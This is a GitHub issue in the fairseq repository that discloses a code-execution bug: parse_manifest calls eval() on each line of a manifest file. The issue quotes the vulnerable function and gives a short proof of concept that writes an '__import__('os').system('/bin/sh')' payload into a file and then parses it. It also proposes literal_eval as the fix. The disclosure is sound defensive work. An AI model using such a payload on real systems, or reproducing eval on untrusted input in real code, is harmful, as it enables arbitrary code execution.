Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Dangerous implement of parsers (fairseq.data.codedataset.parse_manifest) can cause RCE while parsing a well-constructed evil file. #4869

Open
Lyutoon opened this issue Nov 17, 2022 · 0 comments

Comments

@Lyutoon
Copy link

Lyutoon commented Nov 17, 2022

馃悰 Bug

Dangerous function eval is used in fairseq.data.codedataset.parse_manifest. parse_manifest is often used to parse the manifest file while doing loading (see official example https://github.com/facebookresearch/fairseq/blob/b5a039c292facba9c73f59ff34621ec131d82341/examples/textless_nlp/pgslm/prepare_dataset.py). But there is no security check about the incoming file and just apply eval to reading lines. So if an attacker constructs a evil file and feeds it to the server or give it to a people but he doesn't check the file, just load it, and then it will lead to RCE.

But if we check the if-else code:

def parse_manifest(manifest, dictionary):
    audio_files = []
    codes = []
    durations = []
    speakers = []

    with open(manifest) as info:
        for line in info.readlines():
            sample = eval(line.strip())
            if "cpc_km100" in sample:
                k = "cpc_km100"
            elif "hubert_km100" in sample:
                k = "hubert_km100"
            elif "phone" in sample:
                k = "phone"
            else:
                assert False, "unknown format"
            code = sample[k]
            code, duration = parse_code(code, dictionary, append_eos=True)

            codes.append(code)
            durations.append(duration)
            audio_files.append(sample["audio"])
            speakers.append(sample.get("speaker", None))

    return audio_files, codes, durations, speakers

We can see that the check only works for str type, so there is actually no need to use eval.

To Reproduce

Here I give a simplest example.
First construct a evil file:

echo "__import__('os').system('/bin/sh')" > evil_file

Second we just parse it.

from fairseq.data.codedataset import parse_manifest

parse_manifest('evil_file', None)

Environment

  • fairseq Version: 0.12.2
  • OS: linux
  • How you installed fairseq: pip
  • Python version: 3.8.10

Additional context

Actually it can be easily fixed just do not use eval. If we only need the code work on str type, just use str(). Or use literal_eval()

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

1 participant